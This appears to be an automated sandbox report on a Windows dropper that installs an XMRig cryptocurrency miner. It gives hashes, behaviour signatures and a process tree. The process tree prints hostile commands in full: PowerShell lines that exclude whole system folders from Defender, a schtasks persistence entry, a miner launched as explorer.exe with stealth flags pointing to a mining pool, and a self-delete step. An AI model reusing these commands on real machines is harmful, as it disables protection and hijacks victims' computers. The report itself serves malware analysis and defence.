Analysis
-
max time kernel
23s -
max time network
148s -
platform
windows7_x64 -
resource
win7-20231215-en -
resource tags
-
submitted
26-12-2023 04:37
General
-
Target
54b1da1c16d8dd8c121c95eaa705aa93.exe
-
Size
212KB
-
MD5
54b1da1c16d8dd8c121c95eaa705aa93
-
SHA1
95ea8c091e1550778ced92f61e795e071e3f25fe
-
SHA256
37a2d60c1263d20fcbe71038314073e0c9b40cbc0eef31fd05eca9e53be93c75
-
SHA512
570f620a7dade80891189dfad95c514da5f93ca2e650ebba6f72a18201db52252fc03b9bc77370445f2f62b5e903d68f39ba655b2ad453f22cb8ef243b853a2b
-
SSDEEP
6144:K8x1Nj/T9iK4Lpu6HPirxW+26NU7NBsp7:X1X4Lo6wxW+26NU7NBsp7
Malware Config
Signatures
-
xmrig
XMRig is a high performance, open source, cross platform CPU/GPU miner.
-
XMRig Miner payload 18 IoCs
-
Executes dropped EXE 3 IoCs
-
Loads dropped DLL 2 IoCs
-
Legitimate hosting services abused for malware hosting/C2 1 TTPs
-
Looks up external IP address via web service 3 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.
-
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
Creates scheduled task(s) 1 TTPs 2 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
-
Suspicious use of WriteProcessMemory 18 IoCs
Processes
-
C:\Users\Admin\AppData\Local\Temp\54b1da1c16d8dd8c121c95eaa705aa93.exe"C:\Users\Admin\AppData\Local\Temp\54b1da1c16d8dd8c121c95eaa705aa93.exe"1⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\NeverInjector.exe"C:\Users\Admin\AppData\Local\Temp\NeverInjector.exe"2⤵
- Executes dropped EXE
- Suspicious use of WriteProcessMemory
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit3⤵
- Suspicious use of WriteProcessMemory
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'4⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'4⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\NeverInjector.exe"3⤵
- Loads dropped DLL
- Suspicious use of WriteProcessMemory
-
C:\Users\Admin\AppData\Local\Temp\svchost64.exeC:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Users\Admin\AppData\Local\Temp\NeverInjector.exe"4⤵
- Executes dropped EXE
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit5⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'6⤵
- Creates scheduled task(s)
-
C:\Windows\system32\services64.exe"C:\Windows\system32\services64.exe"5⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c C:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"6⤵
-
C:\Users\Admin\AppData\Local\Temp\svchost64.exeC:\Users\Admin\AppData\Local\Temp\svchost64.exe "C:\Windows\system32\services64.exe"7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /c schtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"' & exit8⤵
-
C:\Windows\system32\schtasks.exeschtasks /create /f /sc onlogon /rl highest /tn "services64" /tr '"C:\Windows\system32\services64.exe"'9⤵
- Creates scheduled task(s)
-
C:\Windows\system32\Microsoft\Libs\sihost64.exe"C:\Windows\system32\Microsoft\Libs\sihost64.exe"8⤵
-
C:\Windows\explorer.exeC:\Windows\explorer.exe --cinit-find-x -B --algo=rx/0 --asm=auto --cpu-memory-pool=1 --randomx-mode=auto --randomx-no-rdmsr --cuda-bfactor-hint=12 --cuda-bsleep-hint=100 --url=mine.bmpool.org:6004 --user=6046882 --pass=1608 --cpu-max-threads-hint=20 --cinit-idle-wait=2 --cinit-idle-cpu=80 --cinit-stealth8⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"8⤵
-
C:\Windows\system32\cmd.exe"cmd" /c powershell -Command Add-MpPreference -ExclusionPath '%UserProfile%' & powershell -Command Add-MpPreference -ExclusionPath '%AppData%' & powershell -Command Add-MpPreference -ExclusionPath '%Temp%' & powershell -Command Add-MpPreference -ExclusionPath '%SystemRoot%' & exit6⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin'7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Roaming'7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Users\Admin\AppData\Local\Temp'7⤵
-
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exepowershell -Command Add-MpPreference -ExclusionPath 'C:\Windows'7⤵
-
C:\Windows\System32\cmd.exe"C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "C:\Users\Admin\AppData\Local\Temp\svchost64.exe"5⤵
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 36⤵
-
C:\Users\Admin\AppData\Local\Temp\1.exe"C:\Users\Admin\AppData\Local\Temp\1.exe"2⤵
- Executes dropped EXE
-
C:\Windows\system32\choice.exechoice /C Y /N /D Y /T 31⤵
Network
MITRE ATT&CK Enterprise v15
Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
472B
MD51e77899b9986c189e2e8ee6060ba4b77
SHA101b6bcdb30fa1ffc2be6f85dc7ed069a460e3374
SHA256270facabc4dbe52c9ec6784202339fedba6aa56c954080051ce47a91627922a1
SHA5124f833b6a07a50a36b0c03a9a1744ef938a2d067f6459581cc10cb15eb8ad770cd939ef6a573f68a9abeb574b503492b2999de73807014a34b191f6ecf16ed27b
-
Filesize
274KB
MD5c23dd6dcde8637fd537eb142665a4edf
SHA1ac1d3a691cdd37a8935734270e62186ae0c8f563
SHA2563cd8c058466febed909675da97645ff2c364562a2bab260402185896aea8be59
SHA512b16a7badf694741ddfe519d96418c36a12a315523c8045c60ff1af68886f377d3818c0346fb2ab9292182831869207b7219aad3dc27e37ee95372e59fa886bb7
-
Filesize
7KB
MD51ab316f2838aee04e9c4ef1c0d3029f9
SHA1d2fdf645726e7f500aa9b9eff2f3a93ab3b9b5ae
SHA256b85af2a6fb90b3c6e8ac7e275a87dd04da1c0a8af95b9482db536aa147e4ad83
SHA5129d2815352d78fb35e39e7bb9d227d89fb2f85a4c9a9f28722e519587b68a988bad72195095d95beb64759cd10447e8e298c8dab48637a7d3c7904c698d99c3b8
-
Filesize
7KB
MD58872068357187ad2afc095f282279b41
SHA18ebd1116734a69267f37803ec13e8c3f50721a5b
SHA2563610509a2354f7cdeff19b53d5e0d4182c969c67b2cd54a645811f657f6523b0
SHA5127f791805d124909e1d92c4a3d822f805e58b444a421a7fe24609c4910337c5484091a010b76460eb052347901160651038859ddd4ed00885a66970c8c53cbe9b
-
Filesize
7KB
MD5fe2444c4e4956438cf373c7b147c55a7
SHA165926b3dc12747642ed3ef22a98f6423db54e9e9
SHA256f6ae3ceb1147c28722608b885eb760e79f3851409b8670f98ea733c9f0a0b354
SHA512b173ad9a73de017eee0402d70b1b6c408f90ff31acc6df6742bc9f3a04d84fbb5e6f31cce1e53d5519863de2088cd7c2afe72735136a3186307789d039d4ccbe
-
MD5
d41d8cd98f00b204e9800998ecf8427e
SHA1da39a3ee5e6b4b0d3255bfef95601890afd80709
SHA256e3b0c44298fc1c149afbf4c8996fb92427ae41e4649b934ca495991b7852b855
SHA512cf83e1357eefb8bdf1542850d66d8007d620e4050b5715dc83f4a921d36ce9ce47d0d13c5d85f2b0ff8318d2877eec2f63b931bd47417a81a538327af927da3e
-
Filesize
42KB
MD584cc0c40b8c1a3a5366d30e0c038bddc
SHA136a5f937988d9d2e8109885f1cc172abeca7c974
SHA2565076d9fd2781dcfcb98b71ffa8b9bebab8c11499caf1af17a28e2b661853848c
SHA512a23863de886c23df57dfd038dd7b9cc6a2c7ffcb48e555db8a71155de59f1dbb2fb412fdf1b5610e37e9011450d4adcf829947317901fd93ffa246f2aaac59a2
-
Filesize
36KB
MD51aa155e87018118aa94dcdad5e8bb3ee
SHA1f3d9f7935170538f4219731aa27664dfd5fb6cc0
SHA2567ac2a4b82c31b61fb520f69c33674247e75acbf2c93b7357edb7a62e443e475e
SHA5128df2f7accb24dee4b3acc73fad33fd2adfc3988766c995efb52f677b9b81baeea243aa5c8a1c8596cc68269795017c7903faa3c372a3d8e2da791b0c6d2e11be
-
Filesize
24KB
-
Filesize
9.9MB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
412KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
12KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
412KB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
12KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
12KB
-
Filesize
64KB
-
Filesize
512KB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
64KB
-
Filesize
512KB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
512KB
-
Filesize
56KB
-
Filesize
9.9MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
4KB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
128KB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
7.5MB
-
Filesize
9.9MB
-
Filesize
56KB
-
Filesize
9.9MB
-
Filesize
9.9MB
-
Filesize
296KB
-
Filesize
9.9MB
-
Filesize
9.6MB
-
Filesize
2.9MB
-
Filesize
32KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
512KB
-
Filesize
2.9MB
-
Filesize
512KB
-
Filesize
512KB
-
Filesize
9.6MB
-
Filesize
412KB
-
Filesize
9.6MB
-
Filesize
9.6MB
-
Filesize
9.9MB
-
Filesize
24KB
-
Filesize
512KB
-
Filesize
9.9MB
-
Filesize
248KB